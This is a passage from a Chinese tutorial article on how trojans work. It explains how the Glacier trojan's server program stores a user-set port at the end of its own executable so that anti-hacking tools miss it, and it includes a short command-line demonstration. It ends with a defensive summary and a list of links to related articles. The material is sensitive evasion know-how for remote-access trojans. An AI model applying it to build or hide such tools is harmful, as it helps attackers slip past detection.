      上面一段程序,基本上把相关的系统信息都取到了。

      7、服务器端程序的包装与加密

      用过冰河的人都知道,冰河允许用户自定义端口号。这样做的目的,是为了防止被反黑程序检测出来,这种功能是如何实现的呢?

      首先让我们来做一个实验:

      进入Windows的命令行模式下做如下操作

      1)C:/>copy Server.Exe Server.Bak

      2)建立一个文本文件Test.Txt,其内容为“http://www.patching.net

      3)C:/>type Text.Txt>>Server.Exe

      4)运行Server.Exe

      怎么样?是不是发现Server.Exe仍然可以运行呢?木马服务器端自定制的奥秘就在这里:首先生成了一个EXE文件,这个EXE文件里有一项读取自身进程内容的操作,读取时,文件的指针直接指向进程的末尾,从末尾的倒数N个字节处取得用户定制的信息,比如端口号等,然后传递给程序的相关部分进行处理。这里不给出相关的代码部分,有兴趣的朋友请参考一些文件打包程序代码,它所使用的技术是大同小异的。

      8、总结

      以上讲的几点技术,基本上包括了所有第二代木马的特点,个别的木马程序支持服务器列表,宏传播等,实现上大同小异。随着技术的不断更新和发展,相信离第五代木马出现的日子已经不远了,黑与反黑,如此往复的的进行下去,看来反黑工作要走的路还很长,从根本上防止木马,也只有从我们自身对木马的认识开始,希望这篇文章在您阅读之后能带给您一些 反黑技术上的帮助。

这篇关于木马程序开发技术:病毒源代码详解的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!


http://www.chinasem.cn/article/502022

相关文章

Java中注解与元数据示例详解

Java中注解与元数据示例详解

《Java中注解与元数据示例详解》Java注解和元数据是编程中重要的概念,用于描述程序元素的属性和用途,:本文主要介绍Java中注解与元数据的相关资料,文中通过代码介绍的非常详细,需要的朋友可以参... 目录一、引言二、元数据的概念2.1 定义2.2 作用三、Java 注解的基础3.1 注解的定义3.2 内
阅读更多...
JavaScript中的isTrusted属性及其应用场景详解

JavaScript中的isTrusted属性及其应用场景详解

《JavaScript中的isTrusted属性及其应用场景详解》在现代Web开发中,JavaScript是构建交互式应用的核心语言,随着前端技术的不断发展,开发者需要处理越来越多的复杂场景,例如事件... 目录引言一、问题背景二、isTrusted 属性的来源与作用1. isTrusted 的定义2. 为
阅读更多...
使用Python实现操作mongodb详解

使用Python实现操作mongodb详解

《使用Python实现操作mongodb详解》这篇文章主要为大家详细介绍了使用Python实现操作mongodb的相关知识,文中的示例代码讲解详细,感兴趣的小伙伴可以跟随小编一起学习一下... 目录一、示例二、常用指令三、遇到的问题一、示例from pymongo import MongoClientf
阅读更多...
一文详解Python中数据清洗与处理的常用方法

一文详解Python中数据清洗与处理的常用方法

《一文详解Python中数据清洗与处理的常用方法》在数据处理与分析过程中,缺失值、重复值、异常值等问题是常见的挑战,本文总结了多种数据清洗与处理方法,文中的示例代码简洁易懂,有需要的小伙伴可以参考下... 目录缺失值处理重复值处理异常值处理数据类型转换文本清洗数据分组统计数据分箱数据标准化在数据处理与分析过
阅读更多...
详解如何在React中执行条件渲染

详解如何在React中执行条件渲染

《详解如何在React中执行条件渲染》在现代Web开发中,React作为一种流行的JavaScript库,为开发者提供了一种高效构建用户界面的方式,条件渲染是React中的一个关键概念,本文将深入探讨... 目录引言什么是条件渲染?基础示例使用逻辑与运算符(&&)使用条件语句列表中的条件渲染总结引言在现代
阅读更多...
详解Vue如何使用xlsx库导出Excel文件

详解Vue如何使用xlsx库导出Excel文件

《详解Vue如何使用xlsx库导出Excel文件》第三方库xlsx提供了强大的功能来处理Excel文件,它可以简化导出Excel文件这个过程,本文将为大家详细介绍一下它的具体使用,需要的小伙伴可以了解... 目录1. 安装依赖2. 创建vue组件3. 解释代码在Vue.js项目中导出Excel文件,使用第三
阅读更多...
SQL注入漏洞扫描之sqlmap详解

SQL注入漏洞扫描之sqlmap详解

《SQL注入漏洞扫描之sqlmap详解》SQLMap是一款自动执行SQL注入的审计工具,支持多种SQL注入技术,包括布尔型盲注、时间型盲注、报错型注入、联合查询注入和堆叠查询注入... 目录what支持类型how---less-1为例1.检测网站是否存在sql注入漏洞的注入点2.列举可用数据库3.列举数据库
阅读更多...
Linux之软件包管理器yum详解

Linux之软件包管理器yum详解

《Linux之软件包管理器yum详解》文章介绍了现代类Unix操作系统中软件包管理和包存储库的工作原理,以及如何使用包管理器如yum来安装、更新和卸载软件,文章还介绍了如何配置yum源,更新系统软件包... 目录软件包yumyum语法yum常用命令yum源配置文件介绍更新yum源查看已经安装软件的方法总结软
阅读更多...
java图像识别工具类(ImageRecognitionUtils)使用实例详解

java图像识别工具类(ImageRecognitionUtils)使用实例详解

《java图像识别工具类(ImageRecognitionUtils)使用实例详解》:本文主要介绍如何在Java中使用OpenCV进行图像识别,包括图像加载、预处理、分类、人脸检测和特征提取等步骤... 目录前言1. 图像识别的背景与作用2. 设计目标3. 项目依赖4. 设计与实现 ImageRecogni
阅读更多...
Java访问修饰符public、private、protected及默认访问权限详解

Java访问修饰符public、private、protected及默认访问权限详解

《Java访问修饰符public、private、protected及默认访问权限详解》:本文主要介绍Java访问修饰符public、private、protected及默认访问权限的相关资料,每... 目录前言1. public 访问修饰符特点:示例:适用场景:2. private 访问修饰符特点:示例:
阅读更多...

Copyright China编程 23002807@qq.com

沪ICP备2023033072号-2